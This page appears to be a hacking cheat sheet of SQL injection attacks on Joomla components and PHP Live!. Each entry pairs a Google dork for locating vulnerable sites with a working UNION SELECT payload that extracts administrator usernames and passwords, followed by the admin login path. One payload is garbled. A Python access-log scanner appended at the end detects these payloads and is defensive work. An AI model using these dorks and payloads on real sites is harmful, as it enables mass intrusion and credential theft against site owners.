SQL Injections Joomla




1. Google dork = allinurl:option=com_user

Check for the vulnerability
site/index.php?option=com_user&view=reset&layout=confirm

Check admin UID and password
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=1
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=2
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=3

UNTIL THE INFORMATION TABLE APPEARS

Login
Site/administrator

2. Google dork = allinurl:mod.php?mod=publisher 

Check for the vulnerability
site/mod.php?mod=publisher&op=viewcat&cid=2'

Check admin UID and password
site/mod.php?mod=publisher&op=viewcat&cid=-2+union+all+select+1,group_concat(aid,0x3a,name,0x3a,pwd),3+from+authors--

Login
site/admin.php

3. Google dork = inurl:com_gameserver 

Check for the vulnerability
Site/index.php?option=com_gameserver&view=gamepanel&id=3'

Check admin UID and password
site/index.php?option=com_gameserver&view=gamepanel&id=3+union+select+1,2,group_concat(username,char(58),password),4+from+jos_users-–

Check login
site/path/path/path/admin

4. Google dork = inurl:com_digifolio

Check for the vulnerability
site/index.php?option=com_digifolio&view=project&id=2'

Check admin UID and password
site/index.php?option=com_digifolio&view=project&id=-2+union+all+select+1,group_concat(username,char(58),password),3+from+jos_users-–

Check login
site/admin

5. Google dork = inurl:com_siirler

Check for the vulnerability
site/index.php?option=com_siirler&task=sdetay&sid=
3'

Check admin UID and password
site/index.php?option=com_siirler&task=sdetay&sid=
-3+union+all+select+1,2,concat(username,char(58),password),4+from+jos_users–-

Check login
site/admin

6. Google dork = Powered by PHP Live! v3.3


Check for the vulnerability
site/message_box.php?theme=&l=[username]&x=[xxx]&deptid=2'

Check admin UID and password
site/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-2+union++all+select+1,group_concat(login,char(58),password),3,4,5+from+chat_admin–


Check login
site/admin

7. Google dork = allinurl:option=com_livechat

Check for the vulnerability
site/administrator/components/com_livechat/getChat.php?chat=0&last=3'

Check admin UID and password
site/administrator/components/com_livechat/getChat.php?chat=0&last=-3+union+all+select+1,2,unhex(hex(concat(username,0×3a,password))),4+from+"masih jadi misteri!!"

8. Google dork = allinurl:com_idoblog

Check for the vulnerability
site/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62'

Check admin UID and password
site/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0×3a,username,password)
,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–

Check login
site/administrator

site/index.php?option=com_rsgallery2&Itemid=&page=vote&catid= (Blind SQL Injection)
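
Every request listed above leaves the same trace in a web server access log: a quote or a UNION SELECT string inside a parameter that should hold an integer. The Python sketch below is an added example, not part of the original page; it scans access-log lines for those traces. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters that carry integer ids in the requests listed on this page.
NUMERIC_PARAMS = {"id", "cid", "sid", "gid", "deptid", "last", "userid", "catid", "itemid"}
INTEGER = re.compile(r"-?\d+\Z")
# SQL fragments that appear in the listed requests and never in a legitimate id.
SQL_TOKENS = re.compile(
    r"\bunion\s+(?:all\s+)?select\b|\b(?:group_)?concat(?:_ws)?\s*\(|\bunhex\s*\(|\bjos_users\b",
    re.IGNORECASE,
)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the reasons a request target looks like SQL injection probing."""
    reasons = []
    # parse_qsl percent-decodes values and turns '+' into spaces.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.lower() in NUMERIC_PARAMS and value and not INTEGER.match(value):
            reasons.append(f"{name}: non-integer value in numeric parameter")
        if SQL_TOKENS.search(value):
            reasons.append(f"{name}: SQL keyword in value")
    return reasons

def scan(lines):
    """Return (line_number, target, reasons) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match and (reasons := classify(match.group(1))):
            hits.append((number, match.group(1), reasons))
    return hits

# Constructed sample access log (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?option=com_digifolio&view=project&id=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:02:14 +0000] "GET /index.php?option=com_digifolio&view=project&id=2%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [01/Jan/2024:10:02:31 +0000] "GET /index.php?option=com_digifolio&view=project'
    '&id=-2+union+all+select+1,group_concat(username,char(58),password),3+from+jos_users-- HTTP/1.1" 200 734',
]

if __name__ == "__main__":
    for number, target, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(reasons)}")
```

A hit on the non-integer rule alone usually marks the probing stage; a hit on both rules from the same client marks the extraction stage and warrants rotating the credentials stored in the affected users table.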
